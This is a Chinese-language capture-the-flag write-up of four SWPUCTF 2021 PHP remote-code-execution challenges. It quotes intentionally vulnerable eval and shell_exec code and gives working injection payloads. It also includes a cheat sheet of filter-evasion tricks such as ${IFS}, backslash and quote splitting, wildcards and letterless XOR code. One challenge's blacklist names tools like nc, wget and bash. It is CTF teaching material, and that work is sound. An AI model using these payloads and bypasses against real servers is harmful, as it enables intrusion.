SWPUCTF 2021 RCE题目解析与解题技巧<\/h1>

1. easyrce题目解析<\/h2>

代码审计<\/h3>
<?<\/span>php<\/span>
<\/span><\/span>error_reporting<\/span>(0<\/span>); \/\/ 关闭错误报告
<\/span><\/span><\/span><\/span>highlight_file<\/span>(__FILE__<\/span>); \/\/ 高亮显示当前文件
<\/span><\/span><\/span><\/span>if<\/span>(isset<\/span>($_GET['url'<\/span>])) { \/\/ 检查是否有url参数
<\/span><\/span><\/span><\/span>    eval<\/span>($_GET['url'<\/span>]); \/\/ 直接执行url参数中的PHP代码
<\/span><\/span><\/span><\/span>}
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>漏洞分析<\/h3>

直接使用eval()<\/code>函数执行用户输入的PHP代码<\/li>
没有任何过滤或限制措施<\/li>
典型的无防护RCE(远程代码执行)漏洞<\/li>
<\/ul>
解题步骤<\/h3>

列出根目录文件：
?url=system('ls \/');
<\/code><\/pre>
<\/li>
查看flag文件内容：
?url=system('cat \/flllllaaaaaaggggggg');
<\/code><\/pre>
<\/li>
<\/ol>
关键点<\/h3>

eval()<\/code>函数直接执行PHP代码<\/li>
使用system()<\/code>函数执行系统命令<\/li>
无任何过滤，可直接执行任意命令<\/li>
<\/ul>
2. babyrce题目解析<\/h2>
代码审计(第一部分)<\/h3>
<?<\/span>php<\/span>
<\/span><\/span>error_reporting<\/span>(0<\/span>);
<\/span><\/span>header<\/span>("Content-Type:text\/html;charset=utf-8"<\/span>);
<\/span><\/span>highlight_file<\/span>(__FILE__<\/span>);
<\/span><\/span>if<\/span>($_COOKIE['admin'<\/span>]==<\/span>1<\/span>) { \/\/ 检查cookie中admin值是否为1
<\/span><\/span><\/span><\/span>    include<\/span> "..\/next.php"<\/span>; \/\/ 包含下一个php文件
<\/span><\/span><\/span><\/span>} else<\/span> {
<\/span><\/span>    echo<\/span> "小饼干最好吃啦!"<\/span>;
<\/span><\/span>}
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>代码审计(第二部分 - next.php)<\/h3>
<?<\/span>php<\/span>
<\/span><\/span>error_reporting<\/span>(0<\/span>);
<\/span><\/span>highlight_file<\/span>(__FILE__<\/span>);
<\/span><\/span>error_reporting<\/span>(0<\/span>);
<\/span><\/span>if<\/span> (isset<\/span>($_GET['url'<\/span>])) { \/\/ 检查url参数
<\/span><\/span><\/span><\/span>    $ip=<\/span>$_GET['url'<\/span>];
<\/span><\/span>    if<\/span>(preg_match<\/span>("\/ \/"<\/span>, $ip)) { \/\/ 过滤空格
<\/span><\/span><\/span><\/span>        die<\/span>('nonono'<\/span>);
<\/span><\/span>    }
<\/span><\/span>    $a =<\/span> shell_exec<\/span>($ip); \/\/ 执行系统命令
<\/span><\/span><\/span><\/span>    echo<\/span> $a;
<\/span><\/span>}
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>解题步骤<\/h3>

添加Cookie头：
Cookie: admin=1
<\/code><\/pre>
<\/li>
绕过空格过滤列出目录：
?url=ls${IFS}\/
<\/code><\/pre>
<\/li>
查看flag文件：
?url=cat${IFS}\/flllllaaaaaaggggggg
<\/code><\/pre>
<\/li>
<\/ol>
关键点<\/h3>

需要设置Cookie: admin=1才能进入RCE部分<\/li>
使用${IFS}<\/code>(内部字段分隔符)绕过空格过滤<\/li>
shell_exec()<\/code>函数执行系统命令并返回输出<\/li>
<\/ul>
3. hardrce题目解析<\/h2>
代码审计<\/h3>
<?<\/span>php<\/span>
<\/span><\/span>header<\/span>("Content-Type:text\/html;charset=utf-8"<\/span>);
<\/span><\/span>error_reporting<\/span>(0<\/span>);
<\/span><\/span>highlight_file<\/span>(__FILE__<\/span>);
<\/span><\/span>if<\/span>(isset<\/span>($_GET['wllm'<\/span>])) { \/\/ 检查wllm参数
<\/span><\/span><\/span><\/span>    $wllm =<\/span> $_GET['wllm'<\/span>];
<\/span><\/span>    $blacklist =<\/span> ['\t'<\/span>,'\r'<\/span>,'\n'<\/span>]; \/\/ 黑名单
<\/span><\/span><\/span><\/span>    foreach<\/span> ($blacklist as<\/span> $blackitem) {
<\/span><\/span>        if<\/span> (preg_match<\/span>('\/'<\/span> .<\/span> $blackitem .<\/span> '\/m'<\/span>, $wllm)) {
<\/span><\/span>            die<\/span>("LTLT说不能用这些奇奇怪怪的符号哦!"<\/span>);
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>    if<\/span>(preg_match<\/span>('\/[a-zA-Z]\/is'<\/span>,$wllm)) { \/\/ 过滤所有字母
<\/span><\/span><\/span><\/span>        die<\/span>("Ra's Al Ghul说不能用字母哦!"<\/span>);
<\/span><\/span>    }
<\/span><\/span>    echo<\/span> "NoVic4说:不错哦小伙子,可你能拿到flag吗?"<\/span>;
<\/span><\/span>    eval<\/span>($wllm); \/\/ 执行PHP代码
<\/span><\/span><\/span><\/span>} else<\/span> {
<\/span><\/span>    echo<\/span> "蔡总说:注意审题!"<\/span>;
<\/span><\/span>}
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>解题思路<\/h3>

过滤了所有字母(a-zA-Z)<\/li>
过滤了制表符(\t)、回车符(\r)、换行符(\n)<\/li>
需要使用无字母的PHP代码执行命令<\/li>
<\/ul>
可能的解法<\/h3>

使用数字和符号构造PHP代码<\/li>
利用PHP的字符串连接和位运算<\/li>
使用$_GET[]<\/code>或其他超全局变量<\/li>
<\/ol>
关键点<\/h3>

严格的字母过滤<\/li>
需要构造无字母的PHP代码<\/li>
仍然使用eval()<\/code>函数执行代码<\/li>
<\/ul>
4. finalrce题目解析<\/h2>
代码审计<\/h3>
<?<\/span>php<\/span>
<\/span><\/span>highlight_file<\/span>(__FILE__<\/span>);
<\/span><\/span>if<\/span>(isset<\/span>($_GET['url'<\/span>])) { \/\/ 检查url参数
<\/span><\/span><\/span><\/span>    $url=<\/span>$_GET['url'<\/span>];
<\/span><\/span>    \/\/ 过滤了大量命令和关键字
<\/span><\/span><\/span><\/span>    if<\/span>(preg_match<\/span>('\/bash|nc|wget|ping|ls|cat|more|less|phpinfo|base64|echo|php|python|mv|cp|la|i\/'<\/span>,$url)) {
<\/span><\/span>        echo<\/span> "Sorry,you can't use this."<\/span>;
<\/span><\/span>    } else<\/span> {
<\/span><\/span>        echo<\/span> "Can you see anything?"<\/span>;
<\/span><\/span>        exec<\/span>($url); \/\/ 执行系统命令
<\/span><\/span><\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>解题步骤<\/h3>

使用反斜杠绕过关键字过滤：
?url=l\s \/ | tee 1.txt
<\/code><\/pre>
<\/li>
查看flag文件：
?url=tac \/flllll\aaaaaaggggggg | tee 2.txt
<\/code><\/pre>
<\/li>
<\/ol>
关键点<\/h3>

使用反斜杠\<\/code>绕过关键字过滤<\/li>
exec()<\/code>函数只输出最后一行，需要使用管道和tee<\/code>保存输出<\/li>
过滤了常见命令但可以通过变形绕过<\/li>
<\/ul>
RCE题目通用解题技巧<\/h2>


代码审计要点<\/strong>：<\/p>

查找执行用户输入的代码函数：eval()<\/code>, system()<\/code>, exec()<\/code>, shell_exec()<\/code>, passthru()<\/code>, popen()<\/code>等<\/li>
检查过滤规则和黑名单内容<\/li>
注意是否有输出限制<\/li>
<\/ul>
<\/li>

绕过空格过滤的方法<\/strong>：<\/p>

${IFS}<\/code><\/li>
$IFS$9<\/code><\/li>
<<\/code>或<><\/code><\/li>
%09<\/code>(URL编码的tab)<\/li>
<\/ul>
<\/li>

关键字绕过技巧<\/strong>：<\/p>

使用反斜杠：l\s<\/code>, c\at<\/code><\/li>
使用通配符：\/bin\/c?t<\/code><\/li>
使用变量拼接：a=c;b=at; $a$b file<\/code><\/li>
使用引号：c""at<\/code>, l's'<\/code><\/li>
<\/ul>
<\/li>

无字母数字RCE<\/strong>：<\/p>

使用PHP的位运算构造字符串<\/li>
利用$_GET[]<\/code>传递代码<\/li>
使用异或运算生成字符<\/li>
<\/ul>
<\/li>

信息收集命令<\/strong>：<\/p>

查看目录：ls<\/code>, dir<\/code><\/li>
查看文件：cat<\/code>, tac<\/code>, more<\/code>, less<\/code>, head<\/code>, tail<\/code><\/li>
查找flag：find \/ -name "*flag*"<\/code><\/li>
查看环境：env<\/code>, set<\/code><\/li>
<\/ul>
<\/li>

输出重定向技巧<\/strong>：<\/p>

使用><\/code>写入文件<\/li>
使用| tee<\/code>同时输出到屏幕和文件<\/li>
使用>><\/code>追加内容<\/li>
<\/ul>
<\/li>
<\/ol>
总结<\/h2>
SWPUCTF 2021的RCE题目从易到难展示了不同类型的远程代码执行漏洞和防护绕过技巧。从最简单的无防护RCE到需要绕过各种过滤的高级RCE，这些题目涵盖了CTF比赛中常见的RCE考点。掌握这些题目的解法对于理解Web安全中的代码执行漏洞和防御方法非常有帮助。<\/p>